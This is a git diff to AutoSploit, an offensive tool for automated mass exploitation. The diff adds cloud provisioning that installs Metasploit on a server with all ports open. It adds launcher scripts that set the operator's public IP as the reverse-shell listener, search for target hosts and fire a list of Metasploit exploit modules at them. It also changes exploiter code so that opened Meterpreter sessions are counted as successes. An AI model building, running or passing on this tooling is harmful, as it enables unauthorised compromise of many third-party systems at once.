diff --git a/Vagrant/Vagrantfile b/Vagrant/Vagrantfile new file mode 100644 index 0000000..c427e3a --- /dev/null +++ b/Vagrant/Vagrantfile @@ -0,0 +1,28 @@ +# Use as a strating point to spin up a box in lightsail. +# the vagrant-lightsail plugin is required +# You probably also need to: +# - Configure the ssh keys path +# - Install and configure the aws-cli package + +Vagrant.configure('2') do |config| + config.vm.synced_folder ".", "/vagrant", type: "rsync", + rsync__exclude: ".git/", + rsync__auto: true + + config.ssh.private_key_path = '/path/to/id_rsa' + config.ssh.username = 'ubuntu' + config.vm.box = 'lightsail' + config.vm.box_url = 'https://github.com/thejandroman/vagrant-lightsail/raw/master/box/lightsail.box' + config.vm.hostname = 'autosploit-launcher' + + config.vm.provider :lightsail do |provider, override| + provider.port_info = [{ from_port: 0, to_port: 65535, protocol: + 'all' }] + provider.keypair_name = 'id_rsa' + provider.bundle_id = 'small_1_0' + end + + config.vm.provision "bootstrap", type: "shell", run: "once" do |s| + s.path = "./bootstrap/bootstrap.sh" + end +end diff --git a/Vagrant/bootstrap/bootstrap.sh b/Vagrant/bootstrap/bootstrap.sh new file mode 100644 index 0000000..5f0a31a --- /dev/null +++ b/Vagrant/bootstrap/bootstrap.sh @@ -0,0 +1,20 @@ +#!/usr/bin/env bash + + +echo "Yolosploit configurator 2.42" +sudo apt-get --yes update +sudo apt-get --yes upgrade + +echo "Installing metasploit. BE PATIENT (5 min max?)" +wget --quiet https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run +chmod +x metasploit-latest-linux-x64-installer.run +sudo ./metasploit-latest-linux-x64-installer.run --unattendedmodeui none --prefix /opt/msf --mode unattended + +echo "Installing pyhton2" +sudo apt-get --yes install python python-pip python-virtualenv git + +sudo apt-get --yes install fish +sudo chsh -s /usr/bin/fish ubuntu + +cd ~ +git clone https://github.com/NullArray/AutoSploit diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh new file mode 100644 index 0000000..28f126a --- /dev/null +++ b/dryrun_autosploit.sh @@ -0,0 +1,28 @@ +#!/usr/bin/env bash + + +if [[ $# -lt 2 ]]; then + echo "Syntax:" + echo -e "\t./dryrun_autosploit.sh " + exit 1 +fi + +WHITELIST=$1 +SEARCH_QUERY=$2 +LPORT=4444 + +LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` +TIMESTAMP=`date +%s` + + +echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \ + --whitelist $WHITELIST -e \ + -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \ + --exploit-file-to-use etc/json/default_modules.json \ + --dry-run" + +python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \ + --whitelist $WHITELIST -e \ + -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \ + --exploit-file-to-use etc/json/default_modules.json \ + --dry-run diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index f30a51b..e59d795 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json @@ -146,7 +146,6 @@ "auxiliary/admin/cisco/vpn_3000_ftp_bypass", "exploit/bsdi/softcart/mercantec_softcart ", "exploit/freebsd/misc/citrix_netscaler_soap_bof", - "exploit/freebsd/samba/trans2open", "exploit/linux/ftp/proftp_sreplace ", "exploit/linux/http/dcos_marathon", "exploit/linux/http/f5_icall_cmd", @@ -183,7 +182,6 @@ "exploit/linux/proxy/squid_ntlm_authenticate", "exploit/linux/samba/lsa_transnames_heap", "exploit/linux/samba/setinfopolicy_heap", - "exploit/linux/samba/trans2open", "exploit/multi/elasticsearch/script_mvel_rce", "exploit/multi/elasticsearch/search_groovy_script", "exploit/multi/http/atutor_sqli", @@ -263,27 +261,6 @@ "exploit/windows/smb/ipass_pipe_exec", "exploit/windows/smb/smb_relay", "auxiliary/sqli/oracle/jvm_os_code_10g", - "auxiliary/sqli/oracle/jvm_os_code_11g", - "auxiliary/fuzzers/dns/dns_fuzzer", - "auxiliary/fuzzers/ftp/client_ftp", - "auxiliary/fuzzers/ftp/ftp_pre_post", - "auxiliary/fuzzers/http/http_form_field", - "auxiliary/fuzzers/http/http_get_uri_long", - "auxiliary/fuzzers/http/http_get_uri_strings", - "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", - "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", - "auxiliary/fuzzers/smb/smb_create_pipe", - "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", - "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", - "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", - "auxiliary/fuzzers/smb/smb_tree_connect", - "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", - "auxiliary/fuzzers/smtp/smtp_fuzzer", - "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", - "auxiliary/fuzzers/ssh/ssh_version_15", - "auxiliary/fuzzers/ssh/ssh_version_2", - "auxiliary/fuzzers/ssh/ssh_version_corrupt", - "auxiliary/fuzzers/tds/tds_login_corrupt", - "auxiliary/fuzzers/tds/tds_login_username" + "auxiliary/sqli/oracle/jvm_os_code_11g" ] } diff --git a/etc/json/fuzzers.json b/etc/json/fuzzers.json new file mode 100644 index 0000000..b606973 --- /dev/null +++ b/etc/json/fuzzers.json @@ -0,0 +1,25 @@ +{ + "exploits": [ + "auxiliary/fuzzers/dns/dns_fuzzer", + "auxiliary/fuzzers/ftp/client_ftp", + "auxiliary/fuzzers/ftp/ftp_pre_post", + "auxiliary/fuzzers/http/http_form_field", + "auxiliary/fuzzers/http/http_get_uri_long", + "auxiliary/fuzzers/http/http_get_uri_strings", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "auxiliary/fuzzers/smb/smb_create_pipe", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "auxiliary/fuzzers/smb/smb_tree_connect", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "auxiliary/fuzzers/smtp/smtp_fuzzer", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "auxiliary/fuzzers/ssh/ssh_version_15", + "auxiliary/fuzzers/ssh/ssh_version_2", + "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "auxiliary/fuzzers/tds/tds_login_corrupt", + "auxiliary/fuzzers/tds/tds_login_username" + ] +} diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 97e3e6e..55f94bb 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -121,7 +121,7 @@ def start_exploit(self): "setg threads 20\n" "set rhost {rhost}\n" "set rhosts {rhosts}\n" - "run\n" + "run -z\n" "exit\n" ) @@ -157,11 +157,18 @@ def start_exploit(self): ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) - msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)]) - msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) - win_total += len(msf_wins) - fail_total += len(msf_fails) + msf_wins = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[\+\]', x) or + 'Meterpreter' in x or + 'Session' in x or + 'Sending stage' in x]) + + msf_fails = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[-\]', x)]) + + if len(msf_wins): + win_total += 1 + if len(msf_fails): + fail_total += 1 csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) csv_file.writerow([rhost, diff --git a/run_autosploit.sh b/run_autosploit.sh new file mode 100644 index 0000000..b573908 --- /dev/null +++ b/run_autosploit.sh @@ -0,0 +1,16 @@ +#!/usr/bin/env bash + + +if [[ $# -lt 2 ]]; then + echo "Syntax:" + echo -e "\t./run_autosploit.sh " + exit 1 +fi + +WHITELIST=$1 +LPORT=$2 + +LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` +TIMESTAMP=`date +%s` + +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json